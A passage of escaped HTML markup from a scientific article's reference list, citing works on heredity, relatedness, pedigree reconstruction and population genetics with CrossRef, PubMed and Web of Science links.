href=\u0022\/lookup\/external-ref?access_num=000185728100007\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-7-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-7\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.7\u0022 data-doi=\u002210.1016\/j.tree.2012.02.003\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBonduriansky\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ER.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2012\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ERethinking heredity, again.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003ETrends Ecol. Evol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E27\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E330\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E336\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DTrends%2Bin%2BEcology%2B%2526%2BEvolution%26rft.stitle%253DTrends%2Bin%2BEcology%2B%2526%2BEvolution%26rft.aulast%253DBonduriansky%26rft.auinit1%253DR.%26rft.volume%253D27%26rft.issue%253D6%26rft.spage%253D330%26rft.epage%253D336%26rft.atitle%253DRethinking%2Bheredity%252C%2Bagain.%26rft_id%253Dinfo%253Adoi%252F10.1016%252Fj.tree.2012.02.003%26rft_id%253Dinfo%253Apmid%252F22445060%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1016\/j.tree.2012.02.003\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=22445060\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000305105000008\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-8-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-8\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.8\u0022 data-doi=\u002210.1038\/hdy.1993.94\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBrookfield\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. F. Y.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EParkin\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED. T.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E1993\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EUse of single-locus DNA probes in the establishment of relatedness in wild populations.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EHeredity\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E70\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E660\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E663\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DHeredity%26rft.volume%253D70%26rft.spage%253D660%26rft_id%253Dinfo%253Adoi%252F10.1038%252Fhdy.1993.94%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1038\/hdy.1993.94\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-9-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-9\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.9\u0022 data-doi=\u002210.1371\/journal.pone.0101427\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBrown\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKopps\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAllen\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBejder\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EL.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ELittleford-Colquhoun\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EB.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EPopulation differentiation and hybridisation of Australian Snubfin (\u003Cem\u003EOrcaella heinsohni\u003C\/em\u003E) and Indo-Pacific humpback (\u003Cem\u003ESousa chinensis\u003C\/em\u003E) dolphins in North-Western Australia.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EPLoS One\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E9\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003Ee101427\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DPLoS%2BOne%26rft.volume%253D9%26rft.spage%253De101427%26rft_id%253Dinfo%253Adoi%252F10.1371%252Fjournal.pone.0101427%26rft_id%253Dinfo%253Apmid%252F24988113%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1371\/journal.pone.0101427\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=24988113\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-10-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-10\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.10\u0022 data-doi=\u002210.1146\/annurev-genet-110711-155534\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBrowning\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBrowning\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EB.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2012\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EIdentity by descent between distant relatives: detection and applications.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EAnnu. Rev. Genet.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E46\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E617\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E633\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DAnnual%2Breview%2Bof%2Bgenetics%26rft.stitle%253DAnnu%2BRev%2BGenet%26rft.aulast%253DBrowning%26rft.auinit1%253DS.%2BR.%26rft.volume%253D46%26rft.spage%253D617%26rft.epage%253D633%26rft.atitle%253DIdentity%2Bby%2Bdescent%2Bbetween%2Bdistant%2Brelatives%253A%2Bdetection%2Band%2Bapplications.%26rft_id%253Dinfo%253Adoi%252F10.1146%252Fannurev-genet-110711-155534%26rft_id%253Dinfo%253Apmid%252F22994355%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1146\/annurev-genet-110711-155534\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=22994355\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000311568300028\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-11-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-11\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.11\u0022 data-doi=\u002210.1046\/j.1365-294X.2003.01762.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EColtman\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED. W.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPilkington\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. G.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPemberton\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. M.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2003\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EFine-scale genetic structure in a free-living ungulate population.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E12\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E733\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E742\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMolecular%2BEcology%2B%2528Print%2529%26rft.stitle%253DMolecular%2BEcology%2B%2528Print%2529%26rft.aulast%253DColtman%26rft.auinit1%253DD.%2BW.%26rft.volume%253D12%26rft.issue%253D3%26rft.spage%253D733%26rft.epage%253D742%26rft.atitle%253DFine-scale%2Bgenetic%2Bstructure%2Bin%2Ba%2Bfree-living%2Bungulate%2Bpopulation.%26rft_id%253Dinfo%253Adoi%252F10.1046%252Fj.1365-294X.2003.01762.x%26rft_id%253Dinfo%253Apmid%252F12675828%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1046\/j.1365-294X.2003.01762.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=12675828\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-12-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-12\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.12\u0022 data-doi=\u002210.1111\/1755-0998.12219\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ECope\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ER. C.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ELanyon\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESeddon\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPollett\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EP. K.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EDevelopment and testing of a genetic marker-based pedigree reconstruction system \u2018PR-genie\u2019 incorporating size-class data.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol. Resour.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E14\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E857\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E870\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%2BResour.%26rft.volume%253D14%26rft.spage%253D857%26rft_id%253Dinfo%253Adoi%252F10.1111%252F1755-0998.12219%26rft_id%253Dinfo%253Apmid%252F24373173%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/1755-0998.12219\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=24373173\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-13-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-13\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.13\u0022 data-doi=\u002210.1111\/ele.12373\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ECrean\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKopps\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBonduriansky\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ER.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ERevisiting telegony: offspring inherit an acquired characteristic of their mother\u2019s previous mate.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EEcol. Lett.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E17\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1545\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1552\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DEcol.%2BLett.%26rft.volume%253D17%26rft.spage%253D1545%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fele.12373%26rft_id%253Dinfo%253Apmid%252F25270393%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/ele.12373\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=25270393\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-14-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-14\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.14\u0022 data-doi=\u002210.1016\/j.tree.2013.02.010\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EDanchin\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003E\u00c9.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2013\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EAvatars of information: towards an inclusive evolutionary synthesis.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003ETrends Ecol. Evol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E28\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E351\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E358\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DTrends%2BEcol.%2BEvol.%26rft.volume%253D28%26rft.spage%253D351%26rft_id%253Dinfo%253Adoi%252F10.1016%252Fj.tree.2013.02.010%26rft_id%253Dinfo%253Apmid%252F23540765%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1016\/j.tree.2013.02.010\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=23540765\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000320742700011\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan 